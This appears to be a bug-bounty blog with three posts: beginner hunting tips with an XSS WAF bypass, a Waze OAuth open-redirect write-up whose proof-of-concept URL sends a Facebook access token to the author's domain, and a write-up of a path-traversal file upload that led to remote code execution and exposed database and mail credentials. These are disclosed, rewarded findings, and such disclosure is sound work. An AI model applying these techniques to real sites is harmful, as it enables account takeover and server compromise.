Getting started with Bug Bounty.

Hey, guys! This post is dedicated to all those who want to do bug bounty. Although I am not a *top* ranker like my friends Sandeep, Osama, Parth, Arbaz, etc I learned many things throughout my way in bug bounty and I want to share them in this post 🙂

What should you know before getting into bug bounty? 

  • First of all, you should know basic things about web app(ofc. bug bounties are not limited to it) have what is HTTP? What is HTML? What are HTML Forms? What is JavaScript? What does JS do? Structure of a web app(Nowadays all web apps have MVC). IMO this thing matter. A book like Web Hacking 101 will help a lot.
  • Keep learning new things, How?  HackerOne’s Hactivity (Web Hacking 101 also covers this section), Other Hunters blog, And just dig in whenever you see weird term or thing, Maybe you end up learning a good thing?
  • Play with Burp, Explore it 😉

Approaching a target

  • If you’re new don’t just focus on reward only sites, go for points in this way you will learn by hunting and gaining some rep. points also.
  • Don’t change your target frequently, Give at least 2-3 days if you’re new to hunting it won’t be easy for you to find your first bug in minutes or hours.
  • Before hunting for bugs, Explore the web app see what type of app it is, Get some idea of its basic. I always checkout API Docs which gives me a quick overview of web app.
  • If you think that a part of site should have something or something can be bypassed, Dig in it, Don’t give up, Just a few days back Osama and I was hunting an endpoint and he ended up bypassing a fix, I gave up but he didn’t ;).
  • Try to bypass their filters,waf most of the time there will be a bypass for their filters,waf a quick example;

Recently I came across a target there was a WAF (sitewide) which prevents user to input any input which contains JS Event, Such as onmouseover, onload etc I tried on%0Bload but it was getting reflected as %0B itself, So I tested their API to create a post bIt I was doing it with API Console which had WAF so I manually made a request to api.target.com with my payload as content of post and boom it executed 🙂 This way I managed to get more XSS in it 😀

  • Don’t be lazy, In above example Manual request bypassed it but not the API console cause API Console was hosted at target.com/api/console which had WAF.

That’s all for now but there will be a second part of this part i will share some more fun things in it.

If you liked it do share 🙂

Thanks for reading.
Harsh from Bugdiscloseguys!

Google VRP : oAuth token stealing.

Original Blog Date is : 

Hey guys! hope you all doing well :), In June/July i decided to hunt on Google Products, As Google have almost everything in scope so i gone though list of Google products/fully integrated acquisitions. ( https://www.google.com/intl/en/about/products/ ), Waze is one of Google’s Fully integrated acquisitions (There’s difference b/w integrated and non-integrated). So i decided to give it a try 🙂

I was looking at Waze iOS app and there was an option to login with Twitter, Show i started capturing requests, The URL was like this;

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxxxx

(not exactly this, feeling lazy to checkout again :P)

The flow works in same manner like `Authorization Code flow` as Twitter don’t have `Implicit flow` (as far as i know)

1 – GET Request to http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx

2 – 302 Response to https://api.twitter.com/oauth/authorize?oauth_token=xxxxx&redirect_uri=http://www.waze.com/SocialMediaServer/redirect?redirect=http://somdomain.waze.com%3Fsession_cookies=xxxx&server=this

&publish=false&on_close=false&community=twitter&lang=&deviceid=0&is_group=false

3 – After authorize, Redirect to http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3F

session_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

4 – And then finally Redirect to http://somdomain.waze.com/twitter?session_cookies=xxxx&oauth_token==xxx&oauth_verifier=xxxxx

So everyone know what is suspicious here; http://www.waze.com/SocialMediaServer/redirect?redirect=http%3A%2F%2Fsomdomain.waze.com%2Ftwitter%3F

session_cookies=xxxx%26oauth_token%3D=xxx%26oauth_verifier=xxxxx

Luckily yes it was vulnerable to open redirect we won the battle already 😀 but wait we’re working with twitter `oauth_veriifier` which is not very usable from attacker perspective. Also twitter requires us to authorize app everytime :/

http://www.waze.com/SocialMediaServer/social/connect?id=twitter&session_cookies=xxx looking at ‘id’ , seems some more social connect possible, so i checked out android app as well and found facebook, linkedin are also there. Started testing on android, the flow for Facebook was completely different here. I started fuzzing around the old url, tried to replace Twitter to Facebook.

GET Request – http://www.waze.com/SocialMediaServer/social/connect?id=facebook&session_cookies=xxx

Response – 500 Error 🙁

But wait i seen many apps working in this pattern /social/*connection_name*/connect , Lets give it a try.

GET – http://www.waze.com/SocialMediaServer/social/facebook/connect?id=twitter&session_cookies=xxx

Response -302 :DDDDD,

Changed ?redirect=http://harshjaiswal.com  and response_type=token,signed_request

Final PoC :

https://m.facebook.com/v2.8/dialog/oauth?auth_type=rerequest&client_id=343050668156&default_audience=friends&redirect_uri=https://waze.com/SocialMediaServer/redirect?redirect=http://harshjaiswal.com&response_type=token,signed_request&return_scopes=true&scope=email,user_friends,user_events

Response –

http://harshjaiswal.com/?redirect=http://harshjaiswal.com#granted_scopes=user_events%2Cuser_friends%2Cemail%2Cpublish_actions%2Cpublic_profile&denied_scopes=&signed_request=XXXXXXX&access_token=EAAAATXXXXX&expires_in=688

Although this was a fully integrated acq. i got less bounty 😛 as they still consider it as acquition FOR bounty purposes 🙁

But its okay! atleast i learned one thing, If they don’t give you endpoint, try to guess it 3:)

I hope you like it. 🙂

Uploading file directory traversal RCE.

Hello guys! This days i’m not much active because of college life 🙁 but this weekend i got enough time to write about one of my Finding on a
private site 🙂 from which i was able to get a Remote code execution on the server 🙂

Site : B*******.com
Description : Bitcoin sell and buy site 
Bug : Remote Code Execution

Ok lets start! first of all the site login system was fully different they send you “Access Code”(An 7 digit code) on the registered email whenever u want to login and it was working on Cloudflare.

Playing around uploader : 

After login there was a page to upload documents which includes ID proof upload which have unrestricted file upload but whenever i upload php and open it, it was getting downloaded, then i started messing around uploader and giving some unsuitable characters given me server error which leakedserver full path, upload script path, and server type (nginx).

Lets Read some files : 

The thing i noticed is anyfile.js was script and node-modules and things like was there (Zero knowledge in node.js) two thing was confirmed  Ngnix – Node.js, but why php wasn’t executing cause HTML was executed which means stored XSS but i was looking for RCE, now one thing i was missing that nginx some times have problem with uploader so i did ../../a.php in filename which uploaded the  a.php in root directory of site, but it was still not executing :/ means php was not configured on nodejs, as i said anyfile.js and its path was there in debug message so i opened it and i was fully shocked :O it was node.js file with Mysql login(root user 😀 ), SMTP mail login(gmail, the same email which sends “Access code” which means we do account takeover from here) and publicly accessible 😉

Lets shell :

Doing some more work i was able to read many files which means i got Arbitary source code read, now as i said cloudflare, Real IP was not available to me, so i started getting its IP which landed me to Email headers which leaked me Server IP, ok but the mysql port 3306 was closed(may be its only up on 127.0.0.1 not on 0.0.0.0) (the same port was configured in anyfile.js) so i started finding another port on the same ip which given me 2 ports, ip:7788 and ip:8899, ip:8899 was clone of site, while ip:7788 have api documentations so by doing some work on ip:7788 one i got its full path which was /home/*user*/php/application/file.php 😀  damn php was configured here now i gone back to port 8899 which was clone of site and used ../../../user/php/a.php and checked it on ip:7788/a.php and bhoom php executed 😀

./My reaction : Lets get into it xD but as Whitehat i can’t, it will violate program’s policy



./Root cause : 
Uploader miss configured in 2 ways -> allowed php and directory change (most probably cause of nginx) — — — Eq. 1
Leak of full path of a server which had php installed. — — — Eq. 2

By Combining Eq1 and Eq2 ; Eq1 + Eq2 = RCE

./Game Over
./Bounty awarded